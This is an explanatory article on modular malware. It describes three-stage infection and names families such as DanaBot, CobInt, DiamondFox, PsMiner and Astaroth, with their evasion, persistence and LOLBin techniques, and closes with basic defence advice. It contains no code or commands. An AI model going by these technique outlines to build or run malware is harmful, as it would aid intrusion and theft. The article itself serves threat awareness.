Malware – malicious software that is
specifically designed to disrupt, damage, or gain unauthorized access to a
computer system. We all heard of it. It comes in different shapes and sizes. We
know them as viruses, trojans, spyware, ransomware, adware, botnets. Over the
years, malware evolved and became so sophisticated that some of them use
different modules to alter how they affect a target system. They are
called modular malware.
Modular malware doesn’t pack all of its
functionality into a single payload. Modular malware is methodical, it has a
more cunning approach and attacks the system in 3 different stages. First, it
installs the essential components that search out the system and network
security about protections, vulnerabilities, chances for exploits, etc. without
alerting of its presence. Then, it can dial to its command and control server
(second stage). This communication server sends back further instructions with
additional malware modules to execute an attack (third stage).
The malware authors can rapidly change the
malware signature to evade security programs, they can react to specific
targets, combine multiple malware modules and so on.
Some of the most famous modular malware
are:
- T9000 – a data gathering
tool. It captures encrypted data, takes screenshots of specific
applications and specifically targets Microsoft Office product files and
Skype users. Its modules are designed to evade up to 24 different security
products, altering its installation process to remain undetected. - DanaBot – a multi-stage banking Trojan wildly known for a
series of attacks against Australian banks in 2018. It is using different
plugins to extend its functionality.
It contains a packet sniffing and injection plugin, a VNC remote
viewing plugin, a data harvesting plugin, and a Tor plugin that allows for
secure communication. It also contains a number of anti-analysis features,
updated stealer and remote-control modules so it is highly attractive to
threat actors. - Marap, AdvisorsBot, and CobInt – Three modular malware variants
that are similar but have different uses.
CobInt is a part of a campaign for the banking and financial
cybercrime organization Cobalt Group. Marap and AdvisorsBot are scoping
out target systems for defense and network mapping, and decides should the
malware download the full payload. If the target system has value, the
malware calls for the second stage of the attack. Like other modular
malware variants, this tree malware follows a three-step flow. The first
stage is typically an email with an infected attachment that carries the
initial exploit. If the exploit executes, the malware requests the second
stage. The second stage carries the reconnaissance module which assesses
the security measures and network landscape of the target system. If the
malware finds that everything is appropriate, the third and final module
downloads with the main payload. - DiamondFox – a real diamond in the malware market. The
DiamondFox modular botnet comes with a range of plugins that include
espionage tools, credential stealing tools, DDoS tools, keyloggers, spam mailers, and even a
RAM scraper. Cybercriminals can buy this modular botnet package on
underground forums to gain access to a wide range of advanced attack
capabilities. It is regularly updated and has personalized customer support.
How modular malware has become a more
sophisticated and serious threat, shows these three recent examples:
Security experts have discovered a modular
malware with worm capabilities that is spreading from one server to another and
mine for Monero cryptocurrency by exploiting known vulnerabilities in servers
running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and
SqlServer. This Monero crypto miner uses Systemctl.exe, a worm module named
PsMiner written in the Go language which bundles all the exploit modules used
to hack into vulnerable servers it can find on the Internet.
PsMiner’s worm module also has brute force
capabilities and brute force password cracking component. When malware manages
to infect the server it will execute PowerShell command which downloads a
WindowsUpdate.ps1 malicious payload, that drops the Monero miner as part of the
final infection stage. PcMiner create an “Update service for Windows Service”
scheduled task by copying the malicious WindowsUpdate.ps1 script to the Windows
Temp folder. This scheduled task is designed to execute the main malware module
every 10 minutes to help it keep persistence on the compromised system. The
last stage payload is the open source Xmrig CPU miner that allows PSMiner to
mine for Monero cryptocurrency.
The Astaroth Trojan itself is nothing new
but now there is a variant that uses Avast antivirus software to gain
information about the target system. The earlier versions
of Astaroth would quit if Avast antivirus was detected, but this variant makes
use of the LOLBins method to ‘inject’ a malicious module into one of its
processes. This new Astarot trojan is using the Avast antivirus Runtime Dynamic
Link Library ‘aswrundll.exe’ to load a malicious module that then loads further
malicious modules and gathers information about the machine, collects and
exfiltrates clipboard data, password information and more.
Aswrundll.exe is very similar to
Microsoft’s own rundll32.exe, which has also been used by malicious actors over
the years, as it enables the execution of DLLs by calling their exported
functions. These are what has become known as a ‘Living Off the Land Binaries’
or LOLBins for short. This particular Astaroth campaign requires the victim to
download a .7zip file containing a .lnk file that initializes the malware
itself. This then generates a process using the Windows Management
Instrumentation Command (wmic.exe) utility to initialize an XSL script
processing attack. This remote script contains a well-hidden code that uses
several functions to hide from antivirus defenses, it initiates the download of
the payload files disguised as images and extension-less files with the Trojan
modules. These techniques used in the Astaroth campaign show how truly
effective these methods are at evading antivirus products.
Previously
mentioned CobInt – a new malware technique making phishing attacks harder to
spot. Last summer researchers at Proofpoint discovered a pair of modular
downloaders with two unusual factors in their use. First, the loaders were conducting
exploration on the infected system to decide whether the full payload will be
downloaded. Second, the loaders, with very small and carefully obfuscated
footprints, were being launched by a major criminal organization the Cobalt Group.
This is the first time that the researchers have seen this kind of a
number of major actors using tiny downloaders. The new modular downloader named
“CobInt” is difficult to detect if you don’t know what you’re looking for.
The process of infecting a target machine is performed in three steps. Each of
the three modules is small and uses multiple layers of obfuscation to avoid
detection. The first module is an email with an attachment carrying the initial
exploit. If the exploit code can execute, it immediately sends a request for
the second-stage downloader. This downloader, written in C, will do an
observation on the target system to determine whether certain security measures
are running that might trap the malware. If the system is safe, then it
downloads the final payload and establishes persistence on the computer.
Although the process has multiple steps, the total time of execution is measured
in seconds. So far the targets are Russia and the former Soviet republics of
the Commonwealth of Independent States, but it can lure other malicious actors
around the world.
So far, there
is no specific tool that can entirely protect you from modular malware variant.
All you can do is keep your system up to date and invest in anti-virus and
anti-malware software.